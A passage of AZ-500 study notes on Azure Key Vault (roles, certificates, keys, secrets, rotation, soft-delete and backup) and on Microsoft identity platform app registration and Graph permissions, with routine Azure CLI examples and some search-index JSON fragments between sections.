                            • User plus application access. The application accesses Key Vault on behalf of a signed-in user. Examples of this type of access include Azure PowerShell and the Azure portal. User access is granted in two ways. They can either access Key Vault from any application, or they must use a specific application (referred to as compound identity).
                            • Application-only access. The application runs as a daemon service or background job. The application identity is granted access to the key vault.

                            For both types of access, the application authenticates with Microsoft Entra ID. The model of a single mechanism for authentication to both planes has several benefits:

                            • Organizations can centrally control access to all key vaults in their organization.
                            • If a user leaves, they instantly lose access to all key vaults in the organization.
                            • Organizations can customize authentication by using the options in Microsoft Entra ID, such as to enable multifactor authentication for added security.
| Role | Management plane permissions | Data plane permissions |
| --- | --- | --- |
| Security team | Key Vault Contributor | Keys: backup, create, delete, get, import, list, restore. Secrets: all operations |
| Developers and operators | Key Vault deploy permission. Note: this permission allows deployed VMs to fetch secrets from a key vault. | None |
| Auditors | None | Keys: list. Secrets: list. Note: this permission enables auditors to inspect attributes (tags, activation dates, expiration dates) for keys and secrets not emitted in the logs. |
| Application | None | Keys: sign. Secrets: get |

                            The three team roles need access to other resources along with Key Vault permissions. To deploy VMs (or the Web Apps feature of Azure App Service), developers and operators need Contributor access to those resource types. Auditors need read access to the Storage account where the Key Vault logs are stored.

Some built-in RBAC roles in Azure:

| Built-in role | Description | ID |
| --- | --- | --- |
| Key Vault Administrator | Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. | 00482a5a-887f-4fb3-b363-3b7fe8e74483 |
| Key Vault Certificates Officer | Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | a4417e6f-fecd-4de8-b567-7b0420556985 |
| Key Vault Crypto Officer | Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | 14b46e9e-c2b7-41b4-b07b-48a6ebf60603 |
| Key Vault Crypto Service Encryption User | Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. | e147488a-f6f5-4113-8e2d-b22465e65bf6 |
| Key Vault Crypto User | Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. | 12338af0-0e69-4776-bea7-57ae8d297424 |
| Key Vault Reader | Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. | 21090545-7ca7-4776-b22c-e363652d74d2 |
| Key Vault Secrets Officer | Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | b86a8fe4-44ce-4948-aee5-eccb2c155cd7 |
| Key Vault Secrets User | Read secret contents including secret portion of a certificate with private key. Only works for key vaults that use the 'Azure role-based access control' permission model. | 4633458b-17de-408a-b874-0445c86b69e6 |

1.2. Deploy and manage Key Vault certificates

                            Key Vault certificates support provides for management of your x509 certificates and enables:

                            • A certificate owner to create a certificate through a Key Vault creation process or through the import of an existing certificate. Includes both self-signed and CA-generated certificates.
                            • A Key Vault certificate owner to implement secure storage and management of X509 certificates without interaction with private key material.
                            • A certificate owner to create a policy that directs Key Vault to manage the life-cycle of a certificate.
• Certificate owners to provide contact information for notification about lifecycle events of expiration and renewal of a certificate.
                            • Automatic renewal with selected issuers - Key Vault partner X509 certificate providers and CAs.

                            When a Key Vault certificate is created, an addressable key and secret are also created with the same name. The Key Vault key allows key operations and the Key Vault secret allows retrieval of the certificate value as a secret. A Key Vault certificate also contains public x509 certificate metadata.

                            When a Key Vault certificate is created, it can be retrieved from the addressable secret with the private key in either PFX or PEM format. However, the policy used to create the certificate must indicate that the key is exportable. If the policy indicates non-exportable, then the private key isn't a part of the value when retrieved as a secret.

The addressable key becomes more relevant with non-exportable Key Vault certificates. The addressable Key Vault key's operations are mapped from the keyusage field of the Key Vault certificate policy used to create the Key Vault certificate. If a Key Vault certificate expires, its addressable key and secret become inoperable.

Two types of key are supported with certificates: RSA and RSA-HSM. Exportable is only allowed with RSA; it is not supported by RSA-HSM.

                            Certificate policy

A certificate policy contains information on how to create and manage the Key Vault certificate lifecycle. When a certificate with a private key is imported into the Key Vault, a default policy is created by reading the x509 certificate. When a Key Vault certificate is created from scratch, a policy needs to be supplied. This policy specifies how to create the Key Vault certificate version, or the next Key Vault certificate version. At a high level, a certificate policy contains the following information (a CLI sketch follows the list):

                            • X509 certificate properties. Contains subject name, subject alternate names, and other properties used to create an x509 certificate request.
                            • Key Properties. Contains key type, key length, exportable, and reuse key fields. These fields instruct key vault on how to generate a key.
                            • Secret properties. Contains secret properties such as content type of addressable secret to generate the secret value, for retrieving certificate as a secret.
                            • Lifetime Actions. Contains lifetime actions for the Key Vault certificate. Each lifetime action contains:
  • Trigger, specified as days before expiry or as a lifetime span percentage.
                              • Action, which specifies the action type: emailContacts, or autoRenew.
                            • Issuer: Contains the parameters about the certificate issuer to use to issue x509 certificates.
                            • Policy attributes: Contains attributes associated with the policy.
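
A minimal sketch of creating a certificate from the default (self-signed) policy; the names are hypothetical:

```
# Minimal sketch: create a self-signed certificate using the default policy.
az keyvault certificate create --vault-name kv-demo-001 --name demo-cert \
  --policy "$(az keyvault certificate get-default-policy)"

az keyvault certificate show --vault-name kv-demo-001 --name demo-cert
```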

                            Certificate Issuer

                            Before you can create a certificate issuer in a Key Vault, the following two prerequisite steps must be completed successfully:

                            1. Onboard to CA providers: An organization administrator must onboard their company with at least one CA provider.
                            2. Admin creates requester credentials for Key Vault to enroll (and renew) SSL certificates: Provides the configuration to be used to create an issuer object of the provider in the key vault.

                            Certificate contacts

                            Certificate contacts contain contact information to send notifications triggered by certificate lifetime events. The contacts information is shared by all the certificates in the key vault. If a certificate's policy is set to auto renewal, then a notification is sent for the following events:

                            • Before certificate renewal
                            • After certificate renewal, and stating if the certificate was successfully renewed, or if there was an error, requiring manual renewal of the certificate
• When it's time to renew a certificate for a certificate policy that is set to manually renew (email only)

                            Certificate access control

The Key Vault that contains certificates manages access control for those same certificates. The access control policy for certificates is distinct from the access control policies for keys and secrets in the same Key Vault. Users might create one or more vaults to hold certificates, to maintain scenario-appropriate segmentation and management of certificates.

                            • Permissions for certificate management operations:
                              • get: Get the current certificate version, or any version of a certificate.
                              • list: List the current certificates, or versions of a certificate.
                              • update: Update a certificate.
                              • create: Create a Key Vault certificate.
                              • import: Import certificate material into a Key Vault certificate.
                              • delete: Delete a certificate, its policy, and all of its versions.
                              • recover: Recover a deleted certificate.
                              • backup: Back up a certificate in a key vault.
                              • restore: Restore a backed-up certificate to a key vault.
                              • managecontacts: Manage Key Vault certificate contacts.
                              • manageissuers: Manage Key Vault certificate authorities/issuers.
                              • getissuers: Get a certificate's authorities/issuers.
                              • listissuers: List a certificate's authorities/issuers.
                              • setissuers: Create or update a Key Vault certificate's authorities/issuers.
                              • deleteissuers: Delete a Key Vault certificate's authorities/issuers.
                            • Permissions for privileged operations:
                              • purge: Purge (permanently delete) a deleted certificate.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#13-create-key-vault-keys","title":"1.3. Create Key Vault keys","text":"

Cryptographic keys in Key Vault are represented as JSON Web Key (JWK) objects. There are two types of keys, depending on how they were created.

• Soft keys: A key processed in software by Key Vault, but encrypted at rest using a system key that is in a Hardware Security Module (HSM). Clients may import an existing RSA or EC (Elliptic Curve) key, or request that Key Vault generates one.
• Hard keys: A key processed in an HSM (Hardware Security Module). These keys are protected in one of the Key Vault HSM Security Worlds (there's one Security World per geography to maintain isolation). Clients may import an RSA or EC key, in soft form or by exporting from a compatible HSM device. Clients may also request Key Vault to generate a key.

Key operations. - Key Vault supports many operations on key objects. Here are a few (a CLI sketch follows the list):

                            • Create: Allows a client to create a key in Key Vault. The value of the key is generated by Key Vault and stored, and isn't released to the client. Asymmetric keys may be created in Key Vault.
                            • Import: Allows a client to import an existing key to Key Vault. Asymmetric keys may be imported to Key Vault using many different packaging methods within a JWK construct.
                            • Update: Allows a client with sufficient permissions to modify the metadata (key attributes) associated with a key previously stored within Key Vault.
• Delete: Allows a client with sufficient permissions to delete a key from Key Vault.
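
A minimal sketch of creating both key types; names are hypothetical, and the RSA-HSM variant assumes a premium-tier vault:

```
# Software-protected ("soft") RSA key:
az keyvault key create --vault-name kv-demo-001 --name demo-key --kty RSA --size 2048

# HSM-protected ("hard") key; requires a premium-tier vault:
az keyvault key create --vault-name kv-demo-001 --name demo-hsm-key --kty RSA-HSM
```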

                            Cryptographic operations. - Once a key has been created in Key Vault, the following cryptographic operations may be performed using the key. For best application performance, verify that operations are performed locally.

                            • Sign and Verify: Strictly, this operation is \"sign hash\" or \"verify hash\", as Key Vault doesn't support hashing of content as part of signature creation. Applications should hash the data to be signed locally, then request that Key Vault signs the hash. Verification of signed hashes is supported as a convenience operation for applications that may not have access to [public] key material.
• Key Encryption / Wrapping: A key stored in Key Vault may be used to protect another key, typically a symmetric content encryption key (CEK). When the key in Key Vault is asymmetric, key encryption is used. When the key in Key Vault is symmetric, key wrapping is used.
                            • Encrypt and Decrypt: A key stored in Key Vault may be used to encrypt or decrypt a single block of data. The size of the block is determined using the key type and selected encryption algorithm. The Encrypt operation is provided for convenience, for applications that may not have access to [public] key material.

                            Apps hosted in App Service and Azure Functions can now define a reference to a secret managed in Key Vault as part of their application settings.
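
A minimal sketch of such a Key Vault reference in an App Service application setting; the app, vault, and secret names are hypothetical, and the app's managed identity must be allowed to read the secret for the reference to resolve:

```
# Minimal sketch: point an app setting at a Key Vault secret.
az webapp config appsettings set --resource-group rg-demo --name app-demo-001 \
  --settings DbPassword="@Microsoft.KeyVault(SecretUri=https://kv-demo-001.vault.azure.net/secrets/DbPassword/)"
```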

                            Configure a hardware security module key-generation solution. -

                            For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary. This scenario is often referred to as Bring Your Own Key (BYOK). The HSMs are FIPS 140-2 Level 2 validated. Azure Key Vault uses Thales nShield family of HSMs to protect your keys. (This functionality isn't available for Azure China.) Generating and transferring an HSM-protected key over the Internet:

                            • You generate the key from an offline workstation, which reduces the attack surface.
• The key is encrypted with a Key Exchange Key (KEK), which stays encrypted until transferred to the Azure Key Vault HSMs. Only the encrypted version of your key leaves the original workstation.
                            • The toolset sets properties on your tenant key that binds your key to the Azure Key Vault security world. After the Azure Key Vault HSMs receive and decrypt your key, only these HSMs can use it. Your key can't be exported. This binding is enforced using the Thales HSMs.
                            • The KEK that encrypts your key is generated inside the Azure Key Vault HSMs, and isn't exportable. The HSMs enforce that there can be no clear version of the KEK outside the HSMs. In addition, the toolset includes attestation from Thales that the KEK isn't exportable and was generated inside a genuine HSM manufactured by Thales.
                            • The toolset includes attestation from Thales that the Azure Key Vault security world was also generated on a genuine HSM manufactured by Thales.
• Microsoft uses separate KEKs and separate security worlds in each geographical region. This separation ensures that your key can be used only in data centers in the region in which you encrypted it. For example, a key from a European customer can't be used in data centers in North America or Asia.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#14-manage-customer-managed-keys","title":"1.4. Manage customer managed keys","text":"

Once you have created your Key Vault and populated it with keys and secrets, the next step is to set up a rotation strategy for the values you store as Key Vault secrets. Secrets can be rotated in several ways:

                            • As part of a manual process
                            • Programmatically by using REST API calls
                            • Through an Azure Automation script

Example of storage service encryption with customer-managed keys. - This service uses Azure Key Vault, which provides highly available and scalable secure storage for RSA cryptographic keys backed by FIPS 140-2 Level 2 validated HSMs (Hardware Security Modules). Key Vault streamlines the key management process and enables customers to maintain control of keys that are used to encrypt data, and to manage and audit their key usage, in order to protect sensitive data as part of their regulatory or compliance needs; the offering is HIPAA and BAA compliant.

                            Customers can generate/import their RSA key to Azure Key Vault and enable Storage Service Encryption. Azure Storage handles the encryption and decryption in a fully transparent fashion using envelope encryption in which data is encrypted using an AES-based key, which in turn is protected using the Customer-Managed Key stored in Azure Key Vault.

Customers can rotate their key in Azure Key Vault as per their compliance policies. When they rotate their key, Azure Storage detects the new key version and re-encrypts the Account Encryption Key for that storage account. Key rotation doesn't result in re-encryption of all data, and there's no other action required from the user.

                            Customers can also revoke access to the storage account by revoking access on their key in Azure Key Vault. There are several ways to revoke access to your keys. Revoking access effectively blocks access to all blobs in the storage account as the Account Encryption Key is inaccessible by Azure Storage.

                            Customers can enable this feature on all available redundancy types of Azure Blob storage including premium storage and can toggle from using Microsoft managed to using customer-managed keys. There's no extra charge for enabling this feature.

                            You can enable this feature on any Azure Resource Manager storage account using the Azure portal, Azure PowerShell, Azure CLI, or the Microsoft Azure Storage Resource Provider API.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#15-key-vault-secrets","title":"1.5. Key vault secrets","text":"

Key Vault provides secure storage of secrets, such as passwords and database connection strings. From a developer's perspective, Key Vault APIs accept and return secret values as strings. Internally, Key Vault stores and manages secrets as sequences of octets (8-bit bytes), with a maximum size of 25k bytes each. The Key Vault service doesn't provide semantics for secrets. It merely accepts the data, encrypts it, stores it, and returns a secret identifier ("ID"). The identifier can be used to retrieve the secret at a later time.

                            Key Vault also supports a contentType field for secrets. Clients may specify the content type of a secret to assist in interpreting the secret data when it's retrieved. The maximum length of this field is 255 characters. There are no pre-defined values. The suggested usage is as a hint for interpreting the secret data. For instance, an implementation may store both passwords and certificates as secrets, then use this field to differentiate.

In summary, the values for Key Vault secrets are:

• Name-value pair - Name must be unique in the Vault
• Value can be any Unicode Transformation Format (UTF-8) string - max of 25 KB in size
                            • Manual or certificate creation
                            • Activation date
                            • Expiration date

Encryption. - All secrets in your Key Vault are stored encrypted. Key Vault encrypts secrets at rest with a hierarchy of encryption keys, with all keys in that hierarchy protected by modules that are Federal Information Processing Standards (FIPS) 140-2 compliant. This encryption is transparent and requires no action from the user. The Azure Key Vault service encrypts your secrets when you add them, and decrypts them automatically when you read them. The encryption leaf key of the key hierarchy is unique to each key vault. The encryption root key of the key hierarchy is unique to the security world, and its protection level varies between regions:

                            • China: root key is protected by a module that is validated for FIPS 140-2 Level 1.
                            • Other regions: root key is protected by a module that is validated for FIPS 140-2 Level 2 or higher.

Secret attributes. - In addition to the secret data, the following attributes may be specified (a CLI sketch follows the list):

• exp: IntDate, optional, default is forever. The exp (expiration time) attribute identifies the expiration time on or after which the secret data SHOULD NOT be retrieved, except in particular situations. This field is for informational purposes only, as it informs users of the key vault service that a particular secret may not be used. Its value MUST be a number containing an IntDate value.
• nbf: IntDate, optional, default is now. The nbf (not before) attribute identifies the time before which the secret data SHOULD NOT be retrieved, except in particular situations. This field is for informational purposes only. Its value MUST be a number containing an IntDate value.
• enabled: boolean, optional, default is true. This attribute specifies whether the secret data can be retrieved. The enabled attribute is used with nbf and exp: when an operation occurs between nbf and exp, it will only be permitted if enabled is set to true. Operations outside the nbf and exp window are automatically disallowed, except in particular situations.
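
A minimal sketch of setting these attributes from the CLI; the names and date are hypothetical:

```
# Minimal sketch: set an expiry date and keep the secret enabled.
az keyvault secret set-attributes --vault-name kv-demo-001 --name DbPassword \
  --expires '2026-12-31T23:59:59Z' --enabled true
```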

                            There are more read-only attributes that are included in any response that includes secret attributes:

                            • created: IntDate, optional. The created attribute indicates when this version of the secret was created. This value is null for secrets created prior to the addition of this attribute. Its value must be a number containing an IntDate value.
                            • updated: IntDate, optional. The updated attribute indicates when this version of the secret was updated. This value is null for secrets that were last updated prior to the addition of this attribute. Its value must be a number containing an IntDate value.

                            Secret access control. - Access Control for secrets managed in Key Vault, is provided at the level of the Key Vault that contains those secrets. The following permissions can be used, on a per-principal basis, in the secrets access control entry on a vault, and closely mirror the operations allowed on a secret object:

                            • Permissions for secret management operations

                              • get: Read a secret
                              • list: List the secrets or versions of a secret stored in a Key Vault
                              • set: Create a secret
                              • delete: Delete a secret
                              • recover: Recover a deleted secret
                              • backup: Back up a secret in a key vault
                              • restore: Restore a backed up secret to a key vault
• Permissions for privileged operations

  • purge: Purge (permanently delete) a deleted secret

                            You can specify more application-specific metadata in the form of tags. Key Vault supports up to 15 tags, each of which can have a 256 character name and a 256 character value.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#configure-key-rotation","title":"Configure key rotation","text":"

Once you have keys and secrets stored in the key vault, it's important to think about a rotation strategy. There are several ways to rotate the values (a minimal manual sketch follows the list):

                            • As part of a manual process
                            • Programmatically by using API calls
                            • Through an Azure Automation script
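
A minimal sketch of a manual rotation, which simply writes a new version of the secret; names are hypothetical:

```
# Minimal sketch: rotate by creating a new secret version.
NEW_PW=$(openssl rand -base64 24)
az keyvault secret set --vault-name kv-demo-001 --name DbPassword --value "$NEW_PW"

# Older versions remain retrievable by version ID until they expire or are purged.
az keyvault secret list-versions --vault-name kv-demo-001 --name DbPassword -o table
```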

The following flow shows how Event Grid and Function Apps can be used to automate the process:

1. Thirty days before the expiration date of a secret, Key Vault publishes the "near expiry" event to Event Grid.
                            2. Event Grid checks the event subscriptions and uses HTTP POST to call the function app endpoint subscribed to the event.
                            3. The function app receives the secret information, generates a new random password, and creates a new version for the secret with the new password in Key Vault.
                            4. The function app updates SQL Server with the new password.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#16-manage-key-vault-safety-and-recovery-features","title":"1.6. Manage Key Vault safety and recovery features","text":"

Key Vault's soft-delete feature allows recovery of deleted vaults and deleted key vault objects (for example, keys, secrets, and certificates). This safeguard offers the following protections:

                            • Once a secret, key, certificate, or key vault is deleted, it remains recoverable for a configurable period of 7 to 90 calendar days. If no configuration is specified, the default recovery period is set to 90 days. Users are provided with sufficient time to notice an accidental secret deletion and respond.
                            • When creating a new key vault, soft-delete is on by default. Once soft-delete is enabled on a key vault, it can't be disabled. Once set, the retention policy interval can't be changed.
                            • The soft-delete feature is available through the REST API, the Azure CLI, PowerShell, .NET/C# interfaces, and ARM templates.
                            • The purge protection retention policy uses the same interval (7-90 days). Once set, the retention policy interval can't be changed.
                            • You can't reuse the name of a key vault that has been soft-deleted until the retention period has passed.
• Permanently deleting (purging) a key vault is possible via a POST operation on the proxy resource and requires special privileges. Generally, only the subscription owner is able to purge a key vault. The POST operation triggers the immediate and irrecoverable deletion of that vault. Exceptions are:

  • When the Azure subscription has been marked as undeletable. In this case, only the service may then perform the actual deletion, and does so as a scheduled process.
  • When the --enable-purge-protection argument is enabled on the vault itself. In this case, Key Vault waits for 90 days from when the original secret object was marked for deletion to permanently delete the object.
• To purge a secret in the soft-deleted state, a service principal must be granted another "purge" access policy permission. The purge access policy permission isn't granted by default to any service principal, including key vault and subscription owners, and must be deliberately set. By requiring an elevated access policy permission to purge a soft-deleted secret, it reduces the probability of accidentally deleting a secret.

                            Key vault recovery. - Upon deleting a key vault object, the service will place the object in a deleted state, making it inaccessible to any retrieval operations. During the soft-delete retention interval, the following apply:

                            • You may list all of the key vaults and key vault objects in the soft-delete state for your subscription as well as access deletion and recovery information about them. Only users with special permissions can list deleted vaults. We recommend that our users create a custom role with these special permissions for handling deleted vaults.
                            • A key vault with the same name can't be created in the same location; correspondingly, a key vault object can't be created in a given vault if that key vault contains an object with the same name and which is in a deleted state.
• Only a privileged user may restore a key vault or key vault object by issuing a recover command on the corresponding proxy resource. A user who is a member of the custom role and has the privilege to create a key vault under the resource group can restore the vault.
                            • Only a privileged user may forcibly delete a key vault or key vault object by issuing a delete command on the corresponding proxy resource.

                            Unless a key vault or key vault object is recovered, at the end of the retention interval the service performs a purge of the soft-deleted key vault or key vault object and its content. Resource deletion may not be rescheduled.
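
A minimal sketch of the soft-delete lifecycle from the CLI; names are hypothetical and assume soft-delete is enabled on the vault:

```
# Minimal sketch: delete, inspect, and recover a soft-deleted secret.
az keyvault secret delete --vault-name kv-demo-001 --name DbPassword
az keyvault secret list-deleted --vault-name kv-demo-001 -o table
az keyvault secret recover --vault-name kv-demo-001 --name DbPassword

# Purging needs an explicit "purge" permission and fails when purge protection is on:
# az keyvault secret purge --vault-name kv-demo-001 --name DbPassword
```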

Billing. - In general, when an object (a key vault, a key, or a secret) is in the deleted state, there are only two operations possible: 'purge' and 'recover'. All the other operations fail. Therefore, even though the object exists, no operations can be performed and hence no usage occurs, so there is no bill. However, there are the following exceptions:

• 'purge' and 'recover' actions count towards normal key vault operations and are billed.
• If the object is an HSM key, the per-key-version, per-month 'HSM Protected key' charge applies if a key version has been used in the last 30 days. After that, since the object is in the deleted state, no operations can be performed against it, so no charge applies.

Soft-delete protection by default from February 2025. - If a secret is deleted and the key vault doesn't have soft-delete protection, it's deleted permanently. Although users can currently opt out of soft-delete during key vault creation, this ability is deprecated. In February 2025, Microsoft enables soft-delete protection on all key vaults, and users will no longer be able to opt out of or turn off soft-delete. This protects secrets from accidental or malicious deletion by a user.

                            Key vault backup. - Back up secrets only if you have a critical business justification. Backing up secrets in your key vault may introduce operational challenges such as maintaining multiple sets of logs, permissions, and backups when secrets expire or rotate. Key Vault maintains availability in disaster scenarios and will automatically fail over requests to a paired region without any intervention from a user. If you want protection against accidental or malicious deletion of your secrets, configure soft-delete and purge protection features on your key vault.

Key Vault does not support the ability to back up more than 500 past versions of a key, secret, or certificate object. Attempting to back up a key, secret, or certificate object may result in an error. It is not possible to delete previous versions of a key, secret, or certificate.

Key Vault doesn't currently provide a way to back up an entire key vault in a single operation. Any attempt to use the commands listed in this document to do an automated backup of a key vault may result in errors and is not supported by Microsoft or the Azure Key Vault team.

When you back up a key vault object, such as a secret, key, or certificate, the backup operation downloads the object as an encrypted blob. This blob can't be decrypted outside of Azure. To get usable data from this blob, you must restore the blob into a key vault within the same Azure subscription and Azure geography. To back up a key vault object, you must have (a CLI sketch follows the list):

                            • Contributor-level or higher permissions on an Azure subscription.
                            • A primary key vault that contains the secrets you want to back up.
                            • A secondary key vault where secrets are restored.
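
A minimal sketch of backing up one secret and restoring it into a second vault; both vault names are hypothetical:

```
# Minimal sketch: export the encrypted blob, then restore it into another vault
# in the same subscription and geography.
az keyvault secret backup  --vault-name kv-demo-001     --name DbPassword --file DbPassword.blob
az keyvault secret restore --vault-name kv-recovery-001 --file DbPassword.blob
```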

Azure Dedicated HSM is most suitable for "lift-and-shift" scenarios that require direct and sole access to HSM devices. Examples include:

                            • Migrating applications from on-premises to Azure Virtual Machines
                            • Migrating applications from Amazon AWS EC2 to virtual machines that use the AWS Cloud HSM Classic service
• Running shrink-wrapped software such as Apache/Nginx SSL Offload, Oracle TDE, and ADCS in Azure Virtual Machines

                            Azure Dedicated HSM is not a good fit for the following type of scenario: Microsoft cloud services that support encryption with customer-managed keys (such as Azure Information Protection, Azure Disk Encryption, Azure Data Lake Store, Azure Storage, Azure SQL Database, and Customer Key for Office 365) that are not integrated with Azure Dedicated HSM.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#2-application-security-features","title":"2. Application Security features","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#21-microsoft-identity-platform","title":"2.1. Microsoft Identity Platform","text":"

                            Some acronyms:

                            • Azure AD Authentication Library (ADAL)
                            • Microsoft Authentication Library (MSAL)
                            • Microsoft Secure Development Lifecycle (SDL)

                            Microsoft identity platform is an evolution of the Azure Active Directory (Azure AD) developer platform. The Microsoft identity platform supports industry-standard protocols such as OAuth 2.0 and OpenID Connect. With this unified Microsoft identity platform (v2.0), you can write code once and authenticate any Microsoft identity into your application.

The fully supported open-source Microsoft Authentication Library (MSAL) is recommended for use against the identity platform endpoints. MSAL:

• is simple to use
• provides great single sign-on (SSO) experiences for your users
• helps you achieve high reliability and performance
• is developed using the Microsoft Secure Development Lifecycle (SDL)

                            With the Microsoft identity platform, one can expand their reach to these kinds of users:

                            • Work and school accounts (Microsoft Entra ID provisioned accounts)
                            • Personal accounts (such as Outlook.com or Hotmail.com)
                            • Your customers who bring their own email or social identity (such as LinkedIn, Facebook, and Google) via MSAL and Azure AD Business-to-Consumer (B2C)

The Microsoft identity platform has two endpoints (v1.0 and v2.0); however, when developing a new application, it's highly recommended that you use the v2.0 (default) endpoint to benefit from the latest features and capabilities.

                            The Microsoft Authentication Library or MSAL can be used in many application scenarios, including the following:

                            • Single-page applications (JavaScript)
                            • Web app signing in users
                            • Web application signing in a user and calling a web API on behalf of the user
                            • Protecting a web API so only authenticated users can access it
                            • Web API calling another downstream Web API on behalf of the signed-in user
                            • Desktop application calling a web API on behalf of the signed-in user
                            • Mobile application calling a web API on behalf of the user who's signed in interactively.
                            • Desktop/service daemon application calling web API on behalf of itself

                            Languages and frameworks

| Library | Supported platforms and frameworks |
| --- | --- |
| MSAL for Android | Android |
| MSAL Angular | Single-page apps with Angular and Angular.js frameworks |
| MSAL for iOS and macOS | iOS and macOS |
| MSAL Go (Preview) | Windows, macOS, Linux |
| MSAL Java | Windows, macOS, Linux |
| MSAL.js | JavaScript/TypeScript frameworks such as Vue.js, Ember.js, or Durandal.js |
| MSAL.NET | .NET Framework, .NET Core, Xamarin Android, Xamarin iOS, Universal Windows Platform |
| MSAL Node | Web apps with Express, desktop apps with Electron, cross-platform console apps |
| MSAL Python | Windows, macOS, Linux |
| MSAL React | Single-page apps with React and React-based libraries (Next.js, Gatsby.js) |

Migrate apps that use ADAL to MSAL. - Active Directory Authentication Library (ADAL) integrates with the Azure AD for developers (v1.0) endpoint, whereas MSAL integrates with the Microsoft identity platform. The v1.0 endpoint supports work accounts but not personal accounts. The v2.0 endpoint unifies Microsoft personal accounts and work accounts into a single authentication system. Additionally, with MSAL, you can also get authentications for Azure AD B2C.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#the-application-model","title":"The Application Model","text":"

                            For an identity provider to know that a user has access to a particular app, both the user and the application must be registered with the identity provider. When you register your application with Microsoft Entra ID, you're providing an identity configuration for your application that allows it to integrate with the Microsoft identity platform. Registering the app also allows you to:

                            • Customize the branding of your application in the sign-in dialog box.
                            • Decide if you want to allow users to sign in only if they belong to your organization. This architecture is known as a single-tenant application. Or, you can allow users to sign in by using any work or school account, which is known as a multi-tenant application.
                            • Request scope permissions. For example, you can request the "user.read" scope, which grants permission to read the profile of the signed-in user.
                            • Define scopes that define access to your web application programming interface (API).
                            • Share a secret with the Microsoft identity platform that proves the app's identity.

                            After the app is registered, it's given a unique identifier that it shares with the Microsoft identity platform when it requests tokens. If the app is a confidential client application, it will also share the secret or the public key depending on whether certificates or secrets were used. The Microsoft identity platform represents applications by using a model that fulfills two main functions:

                            • Identify the app by the authentication protocols it supports.
                            • Provide all the identifiers, Uniform Resource Locators (URLs), secrets, and related information that are needed to authenticate.

                            The Microsoft identity platform:

                            • Holds all the data required to support authentication at runtime.
                            • Holds all the data for deciding what resources an app might need to access, and under what circumstances a given request should be fulfilled.
                            • Provides infrastructure for implementing app provisioning within the app developer's tenant, and to any other Microsoft Entra tenant.
                            • Handles user consent during token request time and facilitates the dynamic provisioning of apps across tenants.

                            Flow in multi-tenant apps

                            In this provisioning flow:

                            1. A user from tenant B attempts to sign in with the app. The authorization endpoint requests a token for the application.
                            2. The user credentials are acquired and verified for authentication.
                            3. The user is prompted to provide consent for the app to gain access to tenant B.
                            4. The Microsoft identity platform uses the application object in tenant A as a blueprint for creating a service principal in tenant B.
                            5. The user receives the requested token.

                            You can repeat this process for more tenants. Tenant A retains the blueprint for the app (application object). Users and admins of all the other tenants where the app is given consent keep control over what the application is allowed to do via the corresponding service principal object in each tenant.
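
                            Step 4 above happens implicitly at consent time, but an admin can also create the service principal for an app explicitly. A minimal sketch with the Azure CLI, using a placeholder application (client) ID:

                            ```bash
                            # Create a service principal in the current tenant for an existing
                            # application object (identified by its appId / client ID).
                            az ad sp create --id <application-client-id>
                            ```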

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#22-register-an-application-with-app-registration","title":"2.2. Register an application with App Registration","text":"

                            Before your app can get a token from the Microsoft identity platform, it must be registered in the Azure portal. Registration integrates your app with the Microsoft identity platform and establishes the information that it uses to get tokens, including:

                            • Application ID: A unique identifier assigned by the Microsoft identity platform.
                            • Redirect URI/URL: One or more endpoints at which your app will receive responses from the Microsoft identity platform. (For native and mobile apps, this is a URI assigned by the Microsoft identity platform.)
                            • Application Secret: A password or a public/private key pair that your app uses to authenticate with the Microsoft identity platform. (Not needed for native or mobile apps.)

                            Like most developers, you will probably use authentication libraries to manage your token interactions with the Microsoft identity platform. Authentication libraries abstract many protocol details, like validation, cookie handling, token caching, and maintaining secure connections, away from the developer and let you focus your development on your app. Microsoft publishes open-source client libraries and server middleware.
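
                            A minimal registration sketch with the Azure CLI; the display name and redirect URI are hypothetical, and the --web-redirect-uris parameter assumes a recent CLI version:

                            ```bash
                            # Register the application (creates the application object).
                            az ad app create \
                              --display-name "demo-web-app" \
                              --web-redirect-uris "https://localhost:5001/signin-oidc"

                            # Add a client secret (the Application Secret mentioned above);
                            # pass the appId returned by the previous command.
                            az ad app credential reset --id <application-client-id>
                            ```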

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#23-configure-microsoft-graph-permissions","title":"2.3. Configure Microsoft Graph permissions","text":"

                            Microsoft Graph exposes granular permissions that control the access that apps have to resources, like users, groups, and mail.

                            Microsoft Graph has two types of permissions:

                            • Delegated permissions are used by apps that have a signed-in user present. For these apps, either the user or an administrator consents to the permissions that the app requests, and the app can act as the signed-in user when making calls to Microsoft Graph. Some delegated permissions can be consented to by non-administrative users, but some higher-privileged permissions require administrator consent.
                            • Application permissions are used by apps that run without a signed-in user present; for example, apps that run as background services or daemons. Application permissions can only be consented to by an administrator.

